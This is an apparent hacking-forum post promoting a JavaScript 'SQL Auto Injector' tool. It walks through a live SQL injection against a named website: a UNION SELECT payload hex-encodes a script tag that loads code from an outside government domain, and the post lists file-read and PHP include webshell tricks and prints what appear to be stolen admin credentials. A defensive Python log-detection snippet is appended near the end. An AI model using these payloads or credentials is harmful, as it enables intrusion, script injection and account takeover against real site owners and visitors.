Assalamualaikum and greetings to all you veterans. This time Joker wants to share a little something: "Basic SQL TOOL Auto Injector v1.0". Joker finds this tool quite interesting because it works purely through the target URL's query code and a parameter string with a valid ID number, and it feels as if we are inside a shell/backdoor :* that we have uploaded to the target server o.O?. Some of the functions in this JS shell:
######################################
1. explore DB(s) = information_schema exist
2. read files = load file "/etc/passwd" FPD & bruteforce
3. write files = FPD <?php include $_GET[i]; ?>
4. select query = use hexa(string) to print strings
5. injections = SQLi commands exposed on that website
######################################
Step 1
A target website vulnerable to SQLi, for which we have already found the total number of columns and a valid ID number.
Live Demo
http://1-net.com.sg/newsroomdetail.php?c...0,11,12--+
=========================================#
Step 2
Turn the large SQLi above into this --> newsid=-26+UNION+ALL+SELECT+0x31,0x32,((0x3c736372697074207372633D27687474703A2F2F7777772E6A6162617270726F762E676F2E69642F726F6F742F70726F66696C2F73716C2E6A73273E3C2F7363726970743E)),0x34,0x35,0x36,0x37,0x38,0x39,0x310,0x311,0x312--+
Live Demo
http://1-net.com.sg/newsroomdetail.php?c...1,0x312--+
=========================================#
Step 3
BINGO!!
:AdminId:AName:APassword:Allow:
:1:onenet_admin:1netadmin_cms:Y:
=========================================#
INFO :-
0x31 = 1
0x310 = 10
http://www.piclist.com/techref/ascii.htm
Code:
script src='http://www.jabarprov.go.id/root/profil/sql.js'></script>
^-- this is what needs to be converted into a HEX string
((0x3c followed by the ASCII text converted into a HEX string))
Conversion result : 736372697074207372633D27687474703A2F2F7777772E6A6162617270726F762E676F2E69642F726F6F742F70726F66696C2F73716C2E6A73273E3C2F7363726970743E
Make it like this --> ((0x3c736372697074207372633D27687474703A2F2F7777772E6A6162617270726F762E676F2E69642F726F6F742F70726F66696C2F73716C2E6A73273E3C2F7363726970743E))
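Seen from the defending side, the hex-encoded column value explained above is straightforward to spot in web server access logs. The following is an added example, not part of the original post or of the tool: it decodes every 0x... literal in a request's query string and flags UNION SELECT requests whose literals decode to HTML markup. The function names and the sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
UNION_SELECT = re.compile(r"\bunion\b(\s+all)?\s+select\b", re.IGNORECASE)
MARKUP = re.compile(r"<\s*/?\s*(script|iframe|img|svg)\b", re.IGNORECASE)


def decode_hex_literals(query):
    """Return the decoded text of every 0x... literal in a query string."""
    decoded = []
    for match in HEX_LITERAL.finditer(query):
        digits = match.group(1)
        if len(digits) % 2:
            # MySQL treats an odd-length literal as having a leading 0.
            digits = "0" + digits
        decoded.append(bytes.fromhex(digits).decode("latin-1"))
    return decoded


def inspect_request(raw_query):
    """Classify one raw (still URL-encoded) query string from an access log."""
    query = unquote_plus(raw_query)  # '+' becomes a space, %xx is decoded
    findings = []
    if UNION_SELECT.search(query):
        findings.append("union-select")
    for text in decode_hex_literals(query):
        if MARKUP.search(text):
            findings.append("hex-encoded-markup: " + text)
    return findings


# Constructed sample query strings, not taken from a real log.
SAMPLE_QUERIES = [
    "newsid=26",
    "newsid=-26+UNION+ALL+SELECT+0x31,0x32,0x3c7363726970743e,0x34,0x310--+",
    "color=0xff00ff",
]

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(q, "->", inspect_request(q) or "clean")
```

A hit on "hex-encoded-markup" together with "union-select" means the application both concatenates the parameter into its SQL and echoes the selected column into the page without HTML escaping, so the fix is a parameterized query plus output encoding rather than a log filter alone.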
Learn To Hack NOT Hack To Learn.
Be smart about how you disguise your real self.